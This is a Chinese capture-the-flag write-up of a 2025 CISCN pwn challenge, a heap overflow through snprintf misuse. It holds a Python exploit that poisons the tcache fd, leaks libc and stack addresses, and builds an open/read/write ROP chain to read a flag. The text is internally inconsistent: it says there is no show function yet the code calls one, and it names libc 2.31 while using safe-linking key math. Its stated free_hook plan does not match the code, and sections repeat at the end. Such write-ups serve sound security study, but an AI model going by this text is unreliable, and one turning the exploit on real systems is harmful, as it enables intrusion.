2025 CISCN & 长城杯半决赛 PWN 题目解析<\/h1>

题目概述<\/h2>
这是一个基于 Protobuf 协议的堆溢出漏洞利用题目，主要考察选手对堆管理和格式化字符串漏洞的理解。题目运行在 libc 2.31 环境下，提供了 add、delete、edit 三个功能点。<\/p>

漏洞分析<\/h2>

主要漏洞点<\/h3>

堆溢出漏洞<\/strong>：<\/p>

存在于 edit 功能中<\/li>
由于 snprintf 函数的使用不当导致<\/li>
可以绕过 size 检查进行堆溢出<\/li> <\/ul> <\/li>

格式化字符串漏洞<\/strong>：<\/p>

与 snprintf 相关的格式化字符串问题<\/li>
可以用来绕过参数传递的限制<\/li> <\/ul> <\/li> <\/ol>
静态分析<\/h3>

关键函数<\/strong>：<\/p>

*(unk_4060+int(v1))<\/code> 用于存储 size<\/li>
堆块上的 size 可以被覆盖<\/li>
read 函数读取数据时可以利用溢出来绕过 size 检查<\/li> <\/ul> <\/li>
缺乏 show 函数<\/strong>：<\/p> 需要通过合并堆块来泄露信息<\/li> 使 tcache 和 unsorted bin 堆块重叠<\/li> <\/ul> <\/li> <\/ol> 利用思路<\/h2> 动态调试步骤<\/h3> 初始堆布局<\/strong>：<\/p> 创建多个堆块 (0x100 大小)<\/li> 为后续合并和溢出做准备<\/li> <\/ul> <\/li> 堆块合并<\/strong>：<\/p> 通过 free 和重新申请使堆块重叠<\/li> 创建 tcache 和 unsorted bin 重叠的情况<\/li> <\/ul> <\/li> 泄露 libc<\/strong>：<\/p> 利用溢出修改 size<\/li> 爆破 _IO_2_1_stdout-8<\/code> 地址<\/li> 获取 libc 基址<\/li> <\/ul> <\/li> 修改 free_hook<\/strong>：<\/p> 再次利用溢出修改 tcache 的 fd<\/li> 将 free_hook 改为 system<\/li> 同时溢出修改一个 chunk 为 "\/bin\/sh"<\/li> <\/ul> <\/li> <\/ol> EXP 关键代码<\/h3> # 初始化堆布局<\/span> <\/span><\/span>add(0x100<\/span>, b<\/span>'flag'<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'1'<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'2'<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'3'<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'4'<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'5'<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'6'<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'7'<\/span>) <\/span><\/span> <\/span><\/span># 构造溢出payload<\/span> <\/span><\/span>pay =<\/span> b<\/span>'A'<\/span> *<\/span> 0x108<\/span> +<\/span> p64(0x110<\/span> *<\/span> 4<\/span> +<\/span>1<\/span>) <\/span><\/span>edit(1<\/span>, len(pay), pay) <\/span><\/span> <\/span><\/span># 触发合并<\/span> <\/span><\/span>rm(2<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'8'<\/span>) <\/span><\/span> <\/span><\/span># 泄露libc<\/span> <\/span><\/span>show(3<\/span>) <\/span><\/span>libc_addr =<\/span> l64()-<\/span>0x203b20<\/span> <\/span><\/span>libc.<\/span>address =<\/span> libc_addr <\/span><\/span> <\/span><\/span># 获取堆基址<\/span> <\/span><\/span>environ_addr =<\/span> libc.<\/span>sym['environ'<\/span>]-<\/span>0x108<\/span> <\/span><\/span>add(0x100<\/span>, b<\/span>'8'<\/span>) <\/span><\/span>rm(8<\/span>) <\/span><\/span>show(3<\/span>) <\/span><\/span>rl(': '<\/span>) <\/span><\/span>key =<\/span> uu64(mx.<\/span>recv(5<\/span>)) <\/span><\/span>heap_base =<\/span> key <<<\/span> 0xC<\/span> <\/span><\/span> <\/span><\/span># 修改tcache fd<\/span> <\/span><\/span>rm(2<\/span>) <\/span><\/span>pay =<\/span> b<\/span>'A'<\/span> *<\/span> 0x108<\/span> +<\/span> p64(0x111<\/span>) <\/span><\/span>pay +=<\/span> p64(key ^<\/span> environ_addr) <\/span><\/span>edit(1<\/span>, len(pay), pay) <\/span><\/span> <\/span><\/span># 获取栈地址<\/span> <\/span><\/span>add(0x100<\/span>, b<\/span>'7'<\/span>) <\/span><\/span>add(0x100<\/span>, b<\/span>'flag'<\/span>) <\/span><\/span>edit(8<\/span>, 0x108<\/span>, b<\/span>'a'<\/span>*<\/span>0x108<\/span>) <\/span><\/span>show(8<\/span>) <\/span><\/span>rl(b<\/span>'a'<\/span>*<\/span>0x108<\/span>) <\/span><\/span>stack_addr =<\/span> h64() <\/span><\/span>target_addr =<\/span> stack_addr-<\/span>0x188<\/span> <\/span><\/span> <\/span><\/span># 构造ROP链<\/span> <\/span><\/span>pop_rdi =<\/span> 0x000000000010f75b<\/span> +<\/span> libc_addr <\/span><\/span>pop_rsi =<\/span> 0x0000000000110a4d<\/span> +<\/span> libc_addr <\/span><\/span>pop_rdx =<\/span> 0x00000000000b0133<\/span> +<\/span> libc_addr <\/span><\/span>pop_rbx =<\/span> 0x00000000000586e4<\/span> +<\/span> libc_addr <\/span><\/span>open_addr =<\/span> libc.<\/span>sym['open'<\/span>] <\/span><\/span>read_addr =<\/span> libc.<\/span>sym['read'<\/span>] <\/span><\/span>write_addr =<\/span> libc.<\/span>sym['write'<\/span>] <\/span><\/span>flag_addr =<\/span> heap_base+<\/span>0x5e0<\/span> <\/span><\/span> <\/span><\/span>orw =<\/span> b<\/span>''<\/span> <\/span><\/span>orw +=<\/span> p64(pop_rdi) +<\/span> p64(flag_addr) +<\/span> p64(pop_rsi) +<\/span> p64(0<\/span>) +<\/span> p64(open_addr) <\/span><\/span>orw +=<\/span> p64(pop_rdi) +<\/span> p64(3<\/span>) +<\/span> p64(pop_rsi) +<\/span> p64(flag_addr) <\/span><\/span>orw +=<\/span> p64(pop_rbx) +<\/span> p64(0x30<\/span>) +<\/span> p64(pop_rdx) +<\/span> p64(0<\/span>)*<\/span>3<\/span> +<\/span> p64(read_addr) <\/span><\/span>orw +=<\/span> p64(pop_rdi) +<\/span> p64(1<\/span>) +<\/span> p64(pop_rsi) +<\/span> p64(flag_addr) <\/span><\/span>orw +=<\/span> p64(pop_rbx) +<\/span> p64(0x30<\/span>) +<\/span> p64(pop_rdx) +<\/span> p64(0<\/span>)*<\/span>3<\/span> +<\/span> p64(write_addr) <\/span><\/span> <\/span><\/span># 最终利用<\/span> <\/span><\/span>add(0x100<\/span>, b<\/span>'a'<\/span>*<\/span>8<\/span> +<\/span> orw) <\/span><\/span>inter() <\/span><\/span><\/code><\/pre>防御方案<\/h2> 修复 snprintf 问题<\/strong>：<\/p> 限制格式化字符串的使用<\/li> 确保不会因为格式化字符串导致缓冲区溢出<\/li> <\/ul> <\/li> 限制 large bin 的 size<\/strong>：<\/p> 防止通过修改 size 来绕过检查<\/li> <\/ul> <\/li> 检查 free 操作<\/strong>：<\/p> 在 free 前验证 chunk 的完整性<\/li> 防止 double free 和 invalid free<\/li> <\/ul> <\/li> 非预期解防御<\/strong>：<\/p> 检查 nop call rdx<\/code> 等指令序列<\/li> 限制直接跳转到敏感函数<\/li> <\/ul> <\/li> <\/ol> 其他攻击思路<\/h2> PHP PWN<\/strong>：<\/p> 题目中提到的 web-pwn 部分<\/li> 需要 PHP 漏洞利用知识<\/li> <\/ul> <\/li> quantum 利用<\/strong>：<\/p> 可能是另一种利用方式<\/li> 需要进一步分析题目细节<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 这道题目综合考察了堆溢出、格式化字符串漏洞和堆布局控制能力。关键点在于通过 snprintf 的漏洞绕过 size 检查，然后利用堆合并和重叠来泄露信息，最终通过修改 tcache 的 fd 实现任意地址写。防御时需要特别注意格式化字符串和堆管理相关的安全检查。<\/p>

2025 CISCN & 长城杯半决赛 PWN 题目解析<\/h1>

题目概述<\/h2> 这是一个基于 Protobuf 协议的堆溢出漏洞利用题目，主要考察选手对堆管理和格式化字符串漏洞的理解。题目运行在 libc 2.31 环境下，提供了 add、delete、edit 三个功能点。<\/p>

漏洞分析<\/h2>

利用思路<\/h2>

题目概述<\/h2>
这是一个基于 Protobuf 协议的堆溢出漏洞利用题目，主要考察选手对堆管理和格式化字符串漏洞的理解。题目运行在 libc 2.31 环境下，提供了 add、delete、edit 三个功能点。<\/p>